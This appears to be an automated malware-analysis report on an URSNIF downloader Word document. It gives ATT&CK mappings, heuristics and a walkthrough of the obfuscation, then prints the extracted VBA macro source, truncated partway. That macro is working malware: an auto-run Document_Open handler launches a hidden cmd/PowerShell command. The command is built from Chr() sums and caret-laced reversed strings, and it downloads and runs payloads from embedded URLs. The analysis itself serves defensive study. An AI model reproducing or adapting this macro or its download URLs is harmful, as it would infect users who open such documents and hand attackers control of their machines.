Verdict: MALICIOUS
Risk score: 222

Malware Insights

MITRE ATT&CK:
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
- T1566.001 Phishing: Spearphishing Attachment
The sample contains VBA macros. The `Document_open` handler (VBA is case-insensitive, so this is the auto-executing Document_Open event) starts with an `On Error Resume Next` split across four lines with `_` continuations, then calls `Shell(..., vbHide)` on a string assembled from the return values of seven helper functions. The ClamAV signature Doc.Downloader.URSNIF-6729855-3 classifies it as an URSNIF downloader document. Each helper builds its part of the command from short string literals and `Chr()` sums (`Chr(10 + 6 + 11 + 4 + 68)` is `c`, `Chr(7 + 4 + 7 + 2 + 47)` is `C`, `Chr(3 + 2 + 3 + 1 + 25)` is `"`), interleaved with `Month "..."` calls whose results are discarded and which exist only to pad the code and break naive pattern matching. The first fragment decodes to `cmd /V/C"set w0=` followed by a value riddled with `^`: cmd.exe consumes the carets as escape characters when it parses the line, and `/V` turns on delayed environment-variable expansion, which loaders of this kind use to reassemble the stored value. With the carets removed and the characters reversed, the fragments visible in the preview read as PowerShell: a list of URLs split on `@`, and a `foreach` loop that downloads each URL with `DownloadFile` to a path under `$env:public`, runs the result with `Invoke-Item` and breaks on the first success. Only part of the command survives in the truncated preview, so the complete command line cannot be recovered from this page, but an auto-executing macro that reaches `Shell()` is on its own sufficient to classify the document as malicious.
Heuristics (6)

- ClamAV: Doc.Downloader.URSNIF-6729855-3 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Downloader.URSNIF-6729855-3
- VBA macros detected [medium, OLE_VBA_MACROS, 3 related findings]: Document contains VBA macro code
- Shell() call in VBA [critical, OLE_VBA_SHELL]: Shell() call in VBA
- Document_Open macro [high, OLE_VBA_DOCOPEN]: Document_Open macro
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where the visible source is unavailable.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the standard Office DrawingML XML namespace URI, not a network indicator; the real download URLs live inside the macro strings.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5039 bytes | cc19fc320d91f213dcc1da32ccd85441eb58d01120c0cd4cc9a2ad62c8785dc6 |
Preview: first 1,000 lines of the extracted script

```vb
Attribute VB_Name = "uPwEQEZXQA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On _
Error _
Resume _
Next
Shell Format(sDwqN) + SsrCmWI + IBvYRhOzwMvULm + nrzjjZTdGc + GonpP + oGGEGVbVfBwAJ + HCPOmvSjKoBuAd, vbHide
End Sub
Attribute VB_Name = "GFGJwPBnnnaZ"
Function nrzjjZTdGc()
On _
Error _
Resume _
Next
Month "NPbN" + "4950"
GiBUrKwEl = Chr(10 + 6 + 11 + 4 + 68) + "md " + "/V/" + Chr(7 + 4 + 7 + 2 + 47) + Chr(3 + 2 + 3 + 1 + 25) + "^" + "se^t " + "w" + "^0=^ " + " ^ ^ " + "^"
Month "3467" + "cDG"
LGAOzWMb = " ^ " + "^ ^" + " ^ ^" + " " + "}}^{h" + Chr(10 + 6 + 11 + 4 + 68) + "ta" + Chr(10 + 6 + 11 + 4 + 68) + "};ka" + "e" + "r^b;" + "au^X$ "
Month "chC" + "qmPvkwBQJ" + "RwsAEDtXAAXMK" + "pju"
Month "c" + "cnBqEa"
JRjNfQivTD = "^me^" + "t" + "^I-^e" + "^k" + "^ov" + "nI" + "^;)^a" + "u" + "X"
Month "7130" + "w" + "poKWtIMX" + "VEwDWbO"
Month "z" + "244940468" + "3713" + "8635"
iSQSni = "$^ ^" + ",^fF^Y" + "^$(^el" + "^" + "i^Fd" + "a^" + "o^"
Month "H" + "248271863" + "2621" + "16016907"
Month "iGECl" + "BtlvwKOPiA"
INMcrfPEYE = "ln^w^o" + "D^" + ".o^P^F$" + "{" + "^yr" + "t^{)"
Month "2861" + "p" + "344661285" + "1144"
Month "ki" + "tGtuzzpL"
CIwToDhVTz = "lu^" + "t" + "$^ ni " + "^fF^Y^" + "$(" + "^h" + Chr(10 + 6 + 11 + 4 + 68) + "a^" + "er^of;" + "'^e^x" + "^e^.^'+" + "^L^jp^$" + "^+^" + "'^\" + "'"
Month "S" + "WdVo"
Month "CtH" + "173327705"
fFtotBURI = "^+" + Chr(10 + 6 + 11 + 4 + 68) + "^il^bu^" + "p" + ":v" + "ne$=" + "a^u^X^$" + ";" + "'^90^" + "4'^" + " ^=" + "^ ^Lj" + "p$" + "^;)'"
Month "2696" + "a" + "v" + "233495919"
Month "P" + "VL" + "3261" + "3870"
Month "wC" + "ih" + "5087" + "8026"
Month "6765" + "56954898" + "3740" + "Izm"
ZCfOf = "^@^'(t^" + "il^p^" + "S^.^'" + "^d^" + "M^" + "6t2" + "Kd^" + "3^D/^mo"
Month "3518" + "TmfbjzmuNq" + "qu" + "4814"
Month "2024" + "tiwj" + "225528419" + "BNpwNv"
Month "FB" + "Lo"
qPHVUuCo = Chr(10 + 6 + 11 + 4 + 68) + ".^dw" + "r^ad" + ".^kh" + "//:p^" + "t" + "^"
Month "ju" + "OEhuIOFMcqMv"
Month "7780" + "qjGzjO"
Month "S" + "USj"
Month "i" + "524003915" + "LTMBhAzK" + "8645"
OoKzKKk = "t^" + "h@X" + Chr(7 + 4 + 7 + 2 + 47) + "^Fn" + "eg21/^m" + "o" + Chr(10 + 6 + 11 + 4 + 68) + ".n" + "eyugn^" + "o^a" + Chr(10 + 6 + 11 + 4 + 68) + "^hn^a"
Month "457792688" + "274667763"
Month "380866548" + "NtFkd"
Month "OQAjEL" + "sipB"
aunwROA = "^h" + "^ul//" + ":" + "ptt" + "h" + "@^"
nrzjjZTdGc = GiBUrKwEl + LGAOzWMb + JRjNfQivTD + iSQSni + INMcrfPEYE + CIwToDhVTz + fFtotBURI + ZCfOf + qPHVUuCo + OoKzKKk + aunwROA
Month "tBHiQ" + "LoQ" + "1058" + "9789"
End Function
Function GonpP()
On _
Error _
Resume _
Next
Month "k" + "vFij"
UzwjvTEm = "03Jg^W" + "^2^0y/^" + "m^o" + Chr(10 + 6 + 11 + 4 + 68) + ".l" + "^" + "evar" + "t^tah^" + "p^hni^"
Month "4639" + "jKHBGEcjrhD"
UEvwL = "h^" + "t" + "i^a^h" + "k//^:^" + "p" + "^tt^h@R" + "Q"
Month "255885610" + "9153"
Month "wGNiUaAz" + "CaCwdGR"
UZCfClP = "GGH" + Chr(10 + 6 + 11 + 4 + 68) + "Bj" + "/nv" + "^.r^" + "o" + Chr(10 + 6 + 11 + 4 + 68) + "e^" + "d" + Chr(10 + 6 + 11 + 4 + 68) + "i^" + "s^a^b.n"
Month "MrzcJLjF" + "240166343"
Month "2185" + "9710"
Month "6910" + "z" + "90" + "zEHcWVfLjKhzj"
ZUjMnQLw = "^g^ise" + "^d/" + "/:p^tth" + "^@t" + "3d"
Month "3207" + "lP" + "a" + "I"
Month "dDXl" + "bj" + "Fj" + "9267"
iKDAzhCs = "I^DB" + "x" + "/t" + "p.^" + "adalerp" + "a^" + "d^air^" + "ar" + "e" + "n" + "u^f//"
Month "440766310" + "8143" + "dufwij" + "RddJCwnDw"
Month "DHjdK" + "512651410"
Month "4829" + "qFIzTztpEiKtA"
Month "ibhE" + "404138178"
Month "kHUYbWcRhzZO" + "WocYhmM"
avdwRT = ":^p^t^" + "th'" + "=" + "l^" + "u^t" + "^" + "$^" + ";tn^eil" + Chr(7 + 4 + 7 + 2 + 47) + "^b^" + "eW.teN" + " t" + Chr(10 + 6 + 11 + 4 + 68)
Month "iaw" + "On
... (truncated)
```